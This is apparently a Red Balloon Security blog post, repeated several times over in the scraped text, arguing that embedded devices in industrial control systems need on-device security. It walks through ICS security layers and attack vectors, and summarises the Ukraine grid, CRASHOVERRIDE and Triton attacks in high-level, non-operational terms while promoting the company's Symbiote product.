ICS deployments are often proprietary and their security controls may be distinctive. The Perdue Model, first created in the 1990s, is an imperfect representation of the most ICS technology-security stacks; it does not reflect technologies and trends that have made ICS more complex over time, such as increasing use of remote connectivity, more channels between the enterprise and control room layers, and expanding access to external parties and vendors. Despite this, our discussion can benefit from an adapted and simplified version of this model, as seen below:

ICS_Web_New@2x

Endpoints need to be secured at every layer, but the quality of security controls is not consistent layer on layer.[1]

As with the enterprise level in most organizations, endpoints at the ICS control level should be (and typically are) protected by and host a wide range of safeguards around the perimeter, within the network and on the endpoints themselves. The importance of physical, digital, cloud and cybersecurity controls at this level has been a given since criminals began to target this level.

Security controls for endpoints at the enterprise level and the control room level have achieved rough equivalency.

Existing ICS protections are not enough to isolate the embedded device layer

The higher up the stack a security control sits, the more attacks it’s likely to deflect. Each of these security controls takes pressure off lower levels and the monitoring and investigation capabilities of the ICS, leaving resources available for detection of threats directed lower in the technology stack.

 

Attacks that reach embedded devices at the lowest ICS level — the controllers, sensors, safety equipment, manufacturing machinery are just a few examples — are low-frequency events. But given these devices’ mission-critical purpose, or their position in hazardous deployments, such attacks carry the highest potential for catastrophic outcomes.

 

Means by which the end devices can be exposed include:

  • Attacks that exploit permissions. These may originate with a person working below the majority of upper-level security controls, who has access to a network that runs next to or very close to mission-critical devices. This may be an operator or an engineer with malicious intent, or one whose credentials or access has been compromised and unwittingly used to transport an attack via accepted communications protocols.

 

  • Supply chain compromises, in which a device sent out for repair or being maintained on site, or one receiving updates, is corrupted at the firmware level.

 

  • Intrusions such as successful phishing compromises that jump the IT/OT divide and access the control room, and from there access the devices using approved communication channels.

 

  • Intrusions perpetrated by operators who deliberately bypass approved communication paths to access devices directly (either for convenience or malicious purposes).
Potential_ICS_Attack_Vectors@2x

Attacks on embedded devices can have multiple points of entry.

Vulnerabilities devices represent a different category of threat, since they originate in device engineering. Like many other vulnerabilities, they sometimes are used to provide engineers with access to device controls. But as with any other convenience, a vulnerability or access path can be exploited by a bad actor who wants to evade security controls and authorization requirements to upload malicious firmware or send commands.

 

Additionally, some communications must pass through all ICS levels, which can be used for malicious purposes as well as normal ones. Communications and operations that can expose the lowest level of devices include:

  • Updates to antivirus, software and firmware need to travel down the technology stack (starting at the DMZ).

 

  • Operators or vendors who may use remote connections to the ICS. Ideally, these remote comms will terminate in a jump server in the DMZ, but often they connect to PCs in the control network or — even worse — directly to the devices. In a worst-case scenario, the remote access server could be located in the control network or device network, allowing direct access to these levels and devices, which will bypass the security controls of upper levels.

 

  • Operators who may deploy unsigned software due to convenience or time constraints, this software is downloaded from external sources or manually carried into the system including down to the device network. Unsigned or maliciously signed software allows malware to be introduced into the system.

 

  • Operators who may deploy software with signatures that are faked, or stolen.

As with other legitimate operations or engineering features, attackers can exploit approved communications protocols (Modbus, Profitnet, etc.) to travel between the control network to the device network.

The current insecure state of devices on the lowest levels

ICS the security provided by controls around or on the shell of the devices is typically not as robust as that provided by controls higher in the system. When attackers are able to circumvent or defeat higher controls, there typically is little meaningful defense at the lowest critical layers:

This effectively leaves embedded device security at the same level of protection we saw in control room endpoints five to 10 years ago. As it was then, conventional thinking presumes a few conditions:

  • Embedded devices are unreachable. This is refuted by supply chain risks, insider errors or threats, carefully orchestrated attacks that succeed in worming through some or all of the other layers of ICS security.

 

  • Embedded devices are not desirable targets. Since these devices are essential to the operation of electrical grids, manufacturing plants, chemical processing, and other critical and/or hazardous ICS, they should be considered valid targets for cyberattacks.

 

  • Embedded device security is too complicated, or will interfere with the primary function of the device. Red Balloon Security’s work, and that of other leading cybersecurity companies, has demonstrated that these devices, like any other endpoint, can operate with robust security hardening their shells and running concurrently with their essential functionality.
 

Recent examples of ICS attacks that impacted the control network layer

While the layers of security provide necessary and, in most cases, effective defense that justifies investment, there are relevant examples of attacks that simply bypassed entire layers or defeated them through compromise of legitimate communications protocols. Notable examples include:

  • The 2015 Ukraine grid attack, in which attackers first spear-phished and then compromised log-in credentials of workers accessing the SCADA system remotely. They then erased firmware in devices, providing a gateway for communications to the substation, and sent commands to end devices at the control network level or above (UPSs).

 

  • The 2016 CRASHOVERRIDE attack, which mostly likely began with credential capture on the IT system and the re-use of those credentials to log into machines at the ICS level, and ultimately led to access of SCADA-connected protection relays, which were then put into diagnostic mode that disabled their protection algorithms.[2]

 

  • The 2017 Triton attack successfully manipulated the firmware of safety instrumentation systems by targeting the engineering work station, rather than HMI or SCADA.

In each of these attacks, normal communications protocols were exploited, which in turn allowed the attackers to access devices at the lowest levels of the ICS.

 

While in some cases the attackers may have exploited flawed access controls or protocols, each of these events demonstrates the feasibility of a dedicated, deliberate campaign to learn how a system operates and use established communications channels to deliver malicious payloads.

 

As such, they are irrefutable proof that devices on the lower levels of ICS can — and will — be subject to cyberattacks. This in turn demonstrates the need for monitoring and protection at the device level.

The case for on-device security

Loading security controls directly onto embedded devices is not the first step in ICS protection. The protections built into other layers are necessary to deflect the large majority of malicious intrusions and mitigate most human errors.

 

But the subset of legitimate threats that can directly access control networks and communications protocols is large enough to warrant an investment in on-device security, particularly given the increasing connectivity of ICS, the prevalence of remote access, and the potential damages that would result from device-level compromise.

 

Security on or next to these devices can also help prevent lower-impact events, such as an incorrect configuration download, unauthorized device tampering or a well-intentioned but faulty device maintenance. Basic security features around the devices also can mitigate the effects of attacks higher in the technology stack that increase network traffic to the point of an overload, which can lead to device failure.

On-device defense, such as Red Balloon’s Symbiote, is designed to fill the embedded endpoint security gap by protecting the application level, OS system, firmware and secure boot process.

Host-based defenses can include firmware hardening through binary reduction and randomization, and runtime protection that can close the ICS security circuit by blocking on-device attacks related to memory corruption, process spawning or forking, malicious code execution, and firmware corruption or erasure. It brings protection down to the hardware layer and a means to proactively alert operators to any anomalous behavior in real time.

 

On-device security is not meant to eliminate patching; rather, it provides a robust defense during the critical time period between when a vulnerability is discovered (whether by an engineering team, researcher, or attacker) and when the patch can be created and applied. At the firmware level, this is especially critical, since patching typically takes longer than software patching.

 

Adoption of these solutions can greatly reduce the vulnerability of essential devices — and provide device manufacturers with a cutting-edge solution designed for the modern deployments and their evolving risks.

 

The deployment of such protections is not a simple process. It requires careful engineering and an iterative process to properly calibrate the security controls so that there is no interference with the devices’ primary functionality. Security, safety and network engineers will have to work collaboratively to achieve a full integration of this technology into existing embedded systems.

 

The good news is that we have been at this juncture before. The challenge is to provide incentive without experiencing the full effects of attacks at the device level, which could easily lead to destruction of equipment, loss of necessary services or serious harm to operators.

 

Click below to learn more about how RBS’s solutions can work with your ICS system.

Protections at the device level are not a replacement for security controls in OT systems and networks. They’re a necessary extension of them.

Embedded devices in industrial control systems (ICS) operate within an increasingly complex array of systems, networks and protocols. The complexity is only increasing as end users require more insight into how ICS operate, and push for more connectivity between controls and individual devices that underpin the systems’ performances. This has had the effect of complicating ICS’ hierarchical communication structure and introducing new cyber threats with the potential to target devices that operate below the control level.

 

As with IT systems that increased connectivity and exposed endpoints (such as PC’s and network infrastructure), ICS have expanded into multiple layers, each of which has security controls designed to protect against cyberattacks that are increasingly common and capable of targeting devices on the operational technology (OT) side.

 

We first witnessed the security evolution in informational technology (IT) systems on the enterprise level. Over the course of two decades, IT systems expanded and incorporated a vast number of new endpoints, and a correspondingly complex new system of connection points, networks, and communication protocols. The proliferation of endpoints and connections led to increased cyber threats and successful intrusions, which ultimately provided incentive to harden and expand security controls throughout the IT environment.  

 

A similar evolution occurred in control rooms in the last 10 years. Devices became more common, more connected, and subsequently more vulnerable. Each year there are more documented attacks targeting endpoints such as SCADA servers and historians, engineering work stations, HMIs, and communications infrastructure. By now, it is accepted that security controls at this ICS level should be as robust as those applied to IT systems.

 

We are now at the point where the next expansion of security must cover the endpoints closest to the ICS physical processes. This includes devices such as actuators, sensors, valves, robotics, and safety equipment, as well as human machine interfaces (HMI), programmable logic controllers (PLCs), fieldbus I/O, and other controllers that operate outside the control room. Here too, some assumptions about the insularity of these endpoints have persisted: They are too hard to reach and exploit; they are not sufficiently valuable as attack targets; controls at higher levels of the ICS technology attack offer sufficient protection.

 

To explain why these assumptions are no longer valid, it is helpful to view the modern ICS system in the context of current ICS cyber threats. It’s also imperative to recognize that cyberattacks can work through even the most robust sequence of security layers or bypass them through exploitation of permissions. Equally important is the recognition that embedded devices at the lowest ICS levels can be accessed via the control room, and that persistent compromise of such devices is not only possible, but not particularly difficult to execute.

Perdue_Model_ICS@2x

Attacks that reach the bottom of the ICS stack are rare, but typically much more damaging that attacks at the higher levels.

Security at all ICS layers will remain essential, and controls at the IT, DMZ and control room levels will continue to deflect the large majority of ICS attack attempts. But the next essential step — which remains far from complete — is to create an truly in-depth ICS security structure by pushing controls onto devices themselves. To understand why, it can be helpful to review of what security at other layers accomplishes — and what it can miss.

ICS security is an evolutionary process

It’s hardly surprising that the concept of on-device security is still gaining purchase, since only a few years ago most of the ICS layers below the enterprise level were thought to be air-gapped, or so hard to access as to endpoint security controls unnecessary, or not worth the disruption they would cause once they were implemented.  

 

The air-gap premise was plausible only as long as the control-room level generally was not connected to the enterprise network, public Internet and wireless networks. However, attacks such as Stuxnet demonstrated that air-gapping was not an impenetrable defense, and the lack of connectivity became an impediment once control room-level endpoints and their collected data became valuable to working groups on the enterprise level.

 

At this point, there were strong arguments for creating or strengthening firewalls, the DMZ, and robust communications protocols. But there was still resistance to putting security directly onto endpoints at the control room level.

 

Five years ago, control room endpoints typically did not run with antivirus, whitelisting or other digital security tools, and they could not receive patches or updates, for fear this would disrupt the plant or system operations. These concerns were not entirely unfounded, as it did requite engineering adjustments to make controls such as antivirus work effectively within SCADA systems and other control assets.

 

But as systems improved, software update signing became the standard, and security controls were calibrated to function without drawing down too much processing power. There also has been a corresponding rise in the number of cyberattacks on the control room level to solidify the case for endpoint protection. Today, in most ICS deployments, control room devices are outfitted with a level of security that equals that of endpoints on the enterprise level.

ICS security, layer on layer

ICS deployments are often proprietary and their security controls may be distinctive. The Perdue Model, first created in the 1990s, is an imperfect representation of the most ICS technology-security stacks; it does not reflect technologies and trends that have made ICS more complex over time, such as increasing use of remote connectivity, more channels between the enterprise and control room layers, and expanding access to external parties and vendors. Despite this, our discussion can benefit from an adapted and simplified version of this model, as seen below:

ICS_Web_New@2x

Endpoints need to be secured at every layer, but the quality of security controls is not consistent layer on layer.[1]

As with the enterprise level in most organizations, endpoints at the ICS control level should be (and typically are) protected by and host a wide range of safeguards around the perimeter, within the network and on the endpoints themselves. The importance of physical, digital, cloud and cybersecurity controls at this level has been a given since criminals began to target this level.

Security controls for endpoints at the enterprise level and the control room level have achieved rough equivalency.

Existing ICS protections are not enough to isolate the embedded device layer

The higher up the stack a security control sits, the more attacks it’s likely to deflect. Each of these security controls takes pressure off lower levels and the monitoring and investigation capabilities of the ICS, leaving resources available for detection of threats directed lower in the technology stack.

 

Attacks that reach embedded devices at the lowest ICS level — the controllers, sensors, safety equipment, manufacturing machinery are just a few examples — are low-frequency events. But given these devices’ mission-critical purpose, or their position in hazardous deployments, such attacks carry the highest potential for catastrophic outcomes.

 

Means by which the end devices can be exposed include:

  • Attacks that exploit permissions. These may originate with a person working below the majority of upper-level security controls, who has access to a network that runs next to or very close to mission-critical devices. This may be an operator or an engineer with malicious intent, or one whose credentials or access has been compromised and unwittingly used to transport an attack via accepted communications protocols.

 

  • Supply chain compromises, in which a device sent out for repair or being maintained on site, or one receiving updates, is corrupted at the firmware level.

 

  • Intrusions such as successful phishing compromises that jump the IT/OT divide and access the control room, and from there access the devices using approved communication channels.

 

  • Intrusions perpetrated by operators who deliberately bypass approved communication paths to access devices directly (either for convenience or malicious purposes).
Potential_ICS_Attack_Vectors@2x

Attacks on embedded devices can have multiple points of entry.

Vulnerabilities or undocumented access on devices represent a different category of threat, since they originate in device engineering. Like many other vulnerabilities, they sometimes are used to provide engineers with access to device controls. But as with any other convenience, a vulnerability or access path can be exploited by a bad actor who wants to evade security controls and authorization requirements to upload malicious firmware or send commands.

 

Additionally, some communications must pass through all ICS levels, which can be used for malicious purposes as well as normal ones. Communications and operations that can expose the lowest level of devices include:

  • Updates to antivirus, software and firmware need to travel down the technology stack (starting at the DMZ).

 

  • Operators or vendors who may use remote connections to the ICS. Ideally, these remote comms will terminate in a jump server in the DMZ, but often they connect to PCs in the control network or — even worse — directly to the devices. In a worst-case scenario, the remote access server could be located in the control network or device network, allowing direct access to these levels and devices, which will bypass the security controls of upper levels.

 

  • Operators who may deploy unsigned software due to convenience or time constraints, this software is downloaded from external sources or manually carried into the system including down to the device network. Unsigned or maliciously signed software allows malware to be introduced into the system.

 

  • Operators who may deploy software with signatures that are faked, or stolen.

As with other legitimate operations or engineering features, attackers can exploit approved communications protocols (Modbus, Profitnet, etc.) to travel between the control network to the device network.

The current insecure state of devices on the lowest levels

ICS the security provided by controls around or on the shell of the devices is typically not as robust as that provided by controls higher in the system. When attackers are able to circumvent or defeat higher controls, there typically is little meaningful defense at the lowest critical layers:

This effectively leaves embedded device security at the same level of protection we saw in control room endpoints five to 10 years ago. As it was then, conventional thinking presumes a few conditions:

  • Embedded devices are unreachable. This is refuted by supply chain risks, insider errors or threats, carefully orchestrated attacks that succeed in worming through some or all of the other layers of ICS security.

 

  • Embedded devices are not desirable targets. Since these devices are essential to the operation of electrical grids, manufacturing plants, chemical processing, and other critical and/or hazardous ICS, they should be considered valid targets for cyberattacks.

 

  • Embedded device security is too complicated, or will interfere with the primary function of the device. Red Balloon Security’s work, and that of other leading cybersecurity companies, has demonstrated that these devices, like any other endpoint, can operate with robust security hardening their shells and running concurrently with their essential functionality.

Recent examples of ICS attacks that impacted the control network layer

While the layers of security provide necessary and, in most cases, effective defense that justifies investment, there are relevant examples of attacks that simply bypassed entire layers or defeated them through compromise of legitimate communications protocols. Notable examples include:

  • The 2015 Ukraine grid attack, in which attackers first spear-phished and then compromised log-in credentials of workers accessing the SCADA system remotely. They then erased firmware in devices, providing a gateway for communications to the substation, and sent commands to end devices at the control network level or above (UPSs).

 

  • The 2016 CRASHOVERRIDE attack, which mostly likely began with credential capture on the IT system and the re-use of those credentials to log into machines at the ICS level, and ultimately led to access of SCADA-connected protection relays, which were then put into diagnostic mode that disabled their protection algorithms.[2]

 

  • The 2017 Triton attack successfully manipulated the firmware of safety instrumentation systems by targeting the engineering work station, rather than HMI or SCADA.

In each of these attacks, normal communications protocols were exploited, which in turn allowed the attackers to access devices at the lowest levels of the ICS.

 

While in some cases the attackers may have exploited flawed access controls or protocols, each of these events demonstrates the feasibility of a dedicated, deliberate campaign to learn how a system operates and use established communications channels to deliver malicious payloads.

 

As such, they are irrefutable proof that devices on the lower levels of ICS can — and will — be subject to cyberattacks. This in turn demonstrates the need for monitoring and protection at the device level.

The case for on-device security

Loading security controls directly onto embedded devices is not the first step in ICS protection. The protections built into other layers are necessary to deflect the large majority of malicious intrusions and mitigate most human errors.

 

But the subset of legitimate threats that can directly access control networks and communications protocols is large enough to warrant an investment in on-device security, particularly given the increasing connectivity of ICS, the prevalence of remote access, and the potential damages that would result from device-level compromise.

 

Security on or next to these devices can also help prevent lower-impact events, such as an incorrect configuration download, unauthorized device tampering or a well-intentioned but faulty device maintenance. Basic security features around the devices also can mitigate the effects of attacks higher in the technology stack that increase network traffic to the point of an overload, which can lead to device failure.

On-device defense, such as Red Balloon’s Symbiote, is designed to fill the embedded endpoint security gap by protecting the application level, OS system, firmware and secure boot process.

Host-based defenses can include firmware hardening through binary reduction and randomization, and runtime protection that can close the ICS security circuit by blocking on-device attacks related to memory corruption, process spawning or forking, malicious code execution, and firmware corruption or erasure. It brings protection down to the hardware layer and a means to proactively alert operators to any anomalous behavior in real time.

 

On-device security is not meant to eliminate patching; rather, it provides a robust defense during the critical time period between when a vulnerability is discovered (whether by an engineering team, researcher, or attacker) and when the patch can be created and applied. At the firmware level, this is especially critical, since patching typically takes longer than software patching.

 

Adoption of these solutions can greatly reduce the vulnerability of essential devices — and provide device manufacturers with a cutting-edge solution designed for the modern deployments and their evolving risks.

 

The deployment of such protections is not a simple process. It requires careful engineering and an iterative process to properly calibrate the security controls so that there is no interference with the devices’ primary functionality. Security, safety and network engineers will have to work collaboratively to achieve a full integration of this technology into existing embedded systems.

 

The good news is that we have been at this juncture before. The challenge is to provide incentive without experiencing the full effects of attacks at the device level, which could easily lead to destruction of equipment, loss of necessary services or serious harm to operators.

 

Click below to learn more about how RBS’s solutions can work with your ICS system.

Protections at the device level are not a replacement for security controls in OT systems and networks. They’re a necessary extension of them.

Embedded devices in industrial control systems (ICS) operate within an increasingly complex array of systems, networks and protocols. The complexity is only increasing as end users require more insight into how ICS operate, and push for more connectivity between controls and individual devices that underpin the systems’ performances. This has had the effect of complicating ICS’ hierarchical communication structure and introducing new cyber threats with the potential to target devices that operate below the control level.

 

As with IT systems that increased connectivity and exposed endpoints (such as PC’s and network infrastructure), ICS have expanded into multiple layers, each of which has security controls designed to protect against cyberattacks that are increasingly common and capable of targeting devices on the operational technology (OT) side.

 

We first witnessed the security evolution in informational technology (IT) systems on the enterprise level. Over the course of two decades, IT systems expanded and incorporated a vast number of new endpoints, and a correspondingly complex new system of connection points, networks, and communication protocols. The proliferation of endpoints and connections led to increased cyber threats and successful intrusions, which ultimately provided incentive to harden and expand security controls throughout the IT environment.  

 

A similar evolution occurred in control rooms in the last 10 years. Devices became more common, more connected, and subsequently more vulnerable. Each year there are more documented attacks targeting endpoints such as SCADA servers and historians, engineering work stations, HMIs, and communications infrastructure. By now, it is accepted that security controls at this ICS level should be as robust as those applied to IT systems.

 

We are now at the point where the next expansion of security must cover the endpoints closest to the ICS physical processes. This includes devices such as actuators, sensors, valves, robotics, and safety equipment, as well as human machine interfaces (HMI), programmable logic controllers (PLCs), fieldbus I/O, and other controllers that operate outside the control room. Here too, some assumptions about the insularity of these endpoints have persisted: They are too hard to reach and exploit; they are not sufficiently valuable as attack targets; controls at higher levels of the ICS technology attack offer sufficient protection.

 

To explain why these assumptions are no longer valid, it is helpful to view the modern ICS system in the context of current ICS cyber threats. It’s also imperative to recognize that cyberattacks can work through even the most robust sequence of security layers or bypass them through exploitation of permissions. Equally important is the recognition that embedded devices at the lowest ICS levels can be accessed via the control room, and that persistent compromise of such devices is not only possible, but not particularly difficult to execute.

Perdue_Model_ICS@2x

Attacks that reach the bottom of the ICS stack are rare, but typically much more damaging that attacks at the higher levels.

Security at all ICS layers will remain essential, and controls at the IT, DMZ and control room levels will continue to deflect the large majority of ICS attack attempts. But the next essential step — which remains far from complete — is to create an truly in-depth ICS security structure by pushing controls onto devices themselves. To understand why, it can be helpful to review of what security at other layers accomplishes — and what it can miss.

ICS security is an evolutionary process

It’s hardly surprising that the concept of on-device security is still gaining purchase, since only a few years ago most of the ICS layers below the enterprise level were thought to be air-gapped, or so hard to access as to endpoint security controls unnecessary, or not worth the disruption they would cause once they were implemented.  

 

The air-gap premise was plausible only as long as the control-room level generally was not connected to the enterprise network, public Internet and wireless networks. However, attacks such as Stuxnet demonstrated that air-gapping was not an impenetrable defense, and the lack of connectivity became an impediment once control room-level endpoints and their collected data became valuable to working groups on the enterprise level.

 

At this point, there were strong arguments for creating or strengthening firewalls, the DMZ, and robust communications protocols. But there was still resistance to putting security directly onto endpoints at the control room level.

 

Five years ago, control room endpoints typically did not run with antivirus, whitelisting or other digital security tools, and they could not receive patches or updates, for fear this would disrupt the plant or system operations. These concerns were not entirely unfounded, as it did requite engineering adjustments to make controls such as antivirus work effectively within SCADA systems and other control assets.

 

But as systems improved, software update signing became the standard, and security controls were calibrated to function without drawing down too much processing power. There also has been a corresponding rise in the number of cyberattacks on the control room level to solidify the case for endpoint protection. Today, in most ICS deployments, control room devices are outfitted with a level of security that equals that of endpoints on the enterprise level.

ICS security, layer on layer

ICS deployments are often proprietary and their security controls may be distinctive. The Perdue Model, first created in the 1990s, is an imperfect representation of the most ICS technology-security stacks; it does not reflect technologies and trends that have made ICS more complex over time, such as increasing use of remote connectivity, more channels between the enterprise and control room layers, and expanding access to external parties and vendors. Despite this, our discussion can benefit from an adapted and simplified version of this model, as seen below:

ICS_Web_New@2x

Endpoints need to be secured at every layer, but the quality of security controls is not consistent layer on layer.[1]

As with the enterprise level in most organizations, endpoints at the ICS control level should be (and typically are) protected by and host a wide range of safeguards around the perimeter, within the network and on the endpoints themselves. The importance of physical, digital, cloud and cybersecurity controls at this level has been a given since criminals began to target this level.

Security controls for endpoints at the enterprise level and the control room level have achieved rough equivalency.

Existing ICS protections are not enough to isolate the embedded device layer

The higher up the stack a security control sits, the more attacks it’s likely to deflect. Each of these security controls takes pressure off lower levels and the monitoring and investigation capabilities of the ICS, leaving resources available for detection of threats directed lower in the technology stack.

 

Attacks that reach embedded devices at the lowest ICS level — the controllers, sensors, safety equipment, manufacturing machinery are just a few examples — are low-frequency events. But given these devices’ mission-critical purpose, or their position in hazardous deployments, such attacks carry the highest potential for catastrophic outcomes.

 

Means by which the end devices can be exposed include:

  • Attacks that exploit permissions. These may originate with a person working below the majority of upper-level security controls, who has access to a network that runs next to or very close to mission-critical devices. This may be an operator or an engineer with malicious intent, or one whose credentials or access has been compromised and unwittingly used to transport an attack via accepted communications protocols.

 

  • Supply chain compromises, in which a device sent out for repair or being maintained on site, or one receiving updates, is corrupted at the firmware level.

 

  • Intrusions such as successful phishing compromises that jump the IT/OT divide and access the control room, and from there access the devices using approved communication channels.

 

  • Intrusions perpetrated by operators who deliberately bypass approved communication paths to access devices directly (either for convenience or malicious purposes).
Potential_ICS_Attack_Vectors@2x

Attacks on embedded devices can have multiple points of entry.

Vulnerabilities or undocumented access on devices represent a different category of threat, since they originate in device engineering. Like many other vulnerabilities, they sometimes are used to provide engineers with access to device controls. But as with any other convenience, a vulnerability or access path can be exploited by a bad actor who wants to evade security controls and authorization requirements to upload malicious firmware or send commands.

Additionally, some communications must pass through all ICS levels, which can be used for malicious purposes as well as normal ones. Communications and operations that can expose the lowest level of devices include:

  • Updates to antivirus, software and firmware need to travel down the technology stack (starting at the DMZ).

 

  • Operators or vendors who may use remote connections to the ICS. Ideally, these remote comms will terminate in a jump server in the DMZ, but often they connect to PCs in the control network or — even worse — directly to the devices. In a worst-case scenario, the remote access server could be located in the control network or device network, allowing direct access to these levels and devices, which will bypass the security controls of upper levels.

 

  • Operators who may deploy unsigned software due to convenience or time constraints, this software is downloaded from external sources or manually carried into the system including down to the device network. Unsigned or maliciously signed software allows malware to be introduced into the system.

 

  • Operators who may deploy software with signatures that are faked, or stolen.

As with other legitimate operations or engineering features, attackers can exploit approved communications protocols (Modbus, Profitnet, etc.) to travel between the control network to the device network.

The current insecure state of devices on the lowest levels

ICS the security provided by controls around or on the shell of the devices is typically not as robust as that provided by controls higher in the system. When attackers are able to circumvent or defeat higher controls, there typically is little meaningful defense at the lowest critical layers:

This effectively leaves embedded device security at the same level of protection we saw in control room endpoints five to 10 years ago. As it was then, conventional thinking presumes a few conditions:

  • Embedded devices are unreachable. This is refuted by supply chain risks, insider errors or threats, carefully orchestrated attacks that succeed in worming through some or all of the other layers of ICS security.

 

  • Embedded devices are not desirable targets. Since these devices are essential to the operation of electrical grids, manufacturing plants, chemical processing, and other critical and/or hazardous ICS, they should be considered valid targets for cyberattacks.

 

  • Embedded device security is too complicated, or will interfere with the primary function of the device. Red Balloon Security’s work, and that of other leading cybersecurity companies, has demonstrated that these devices, like any other endpoint, can operate with robust security hardening their shells and running concurrently with their essential functionality.

Recent examples of ICS attacks that impacted the control network layer

While the layers of security provide necessary and, in most cases, effective defense that justifies investment, there are relevant examples of attacks that simply bypassed entire layers or defeated them through compromise of legitimate communications protocols. Notable examples include:

  • The 2015 Ukraine grid attack, in which attackers first spear-phished and then compromised log-in credentials of workers accessing the SCADA system remotely. They then erased firmware in devices, providing a gateway for communications to the substation, and sent commands to end devices at the control network level or above (UPSs).

 

  • The 2016 CRASHOVERRIDE attack, which mostly likely began with credential capture on the IT system and the re-use of those credentials to log into machines at the ICS level, and ultimately led to access of SCADA-connected protection relays, which were then put into diagnostic mode that disabled their protection algorithms.[2]

 

  • The 2017 Triton attack successfully manipulated the firmware of safety instrumentation systems by targeting the engineering work station, rather than HMI or SCADA.

In each of these attacks, normal communications protocols were exploited, which in turn allowed the attackers to access devices at the lowest levels of the ICS.

 

While in some cases the attackers may have exploited flawed access controls or protocols, each of these events demonstrates the feasibility of a dedicated, deliberate campaign to learn how a system operates and use established communications channels to deliver malicious payloads.

 

As such, they are irrefutable proof that devices on the lower levels of ICS can — and will — be subject to cyberattacks. This in turn demonstrates the need for monitoring and protection at the device level.

The case for on-device security

Loading security controls directly onto embedded devices is not the first step in ICS protection. The protections built into other layers are necessary to deflect the large majority of malicious intrusions and mitigate most human errors.

 

But the subset of legitimate threats that can directly access control networks and communications protocols is large enough to warrant an investment in on-device security, particularly given the increasing connectivity of ICS, the prevalence of remote access, and the potential damages that would result from device-level compromise.

 

Security on or next to these devices can also help prevent lower-impact events, such as an incorrect configuration download, unauthorized device tampering or a well-intentioned but faulty device maintenance. Basic security features around the devices also can mitigate the effects of attacks higher in the technology stack that increase network traffic to the point of an overload, which can lead to device failure.

On-device defense, such as Red Balloon’s Symbiote, is designed to fill the embedded endpoint security gap by protecting the application level, OS system, firmware and secure boot process.

Host-based defenses can include firmware hardening through binary reduction and randomization, and runtime protection that can close the ICS security circuit by blocking on-device attacks related to memory corruption, process spawning or forking, malicious code execution, and firmware corruption or erasure. It brings protection down to the hardware layer and a means to proactively alert operators to any anomalous behavior in real time.

 

On-device security is not meant to eliminate patching; rather, it provides a robust defense during the critical time period between when a vulnerability is discovered (whether by an engineering team, researcher, or attacker) and when the patch can be created and applied. At the firmware level, this is especially critical, since patching typically takes longer than software patching.

 

Adoption of these solutions can greatly reduce the vulnerability of essential devices — and provide device manufacturers with a cutting-edge solution designed for the modern deployments and their evolving risks.

 

The deployment of such protections is not a simple process. It requires careful engineering and an iterative process to properly calibrate the security controls so that there is no interference with the devices’ primary functionality. Security, safety and network engineers will have to work collaboratively to achieve a full integration of this technology into existing embedded systems.

 

The good news is that we have been at this juncture before. The challenge is to provide incentive without experiencing the full effects of attacks at the device level, which could easily lead to destruction of equipment, loss of necessary services or serious harm to operators.

 

Click below to learn more about how RBS’s solutions can work with your ICS system.

[1] Adapted from Cisco CPwE Architecture schematic.

[2] Dragos, Joe Slowik, “Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack,” 2019

[1] Adapted from Cisco CPwE Architecture schematic.

[2] Dragos, Joe Slowik, “Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack,” 2019

[1] Adapted from Cisco CPwE Architecture schematic.

[2] Dragos, Joe Slowik, “Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack,” 2019

]]>
https://redballoonsecurity.com/why-embedded-device-security-is-essential-to-ics-systems/feed/ 0 5385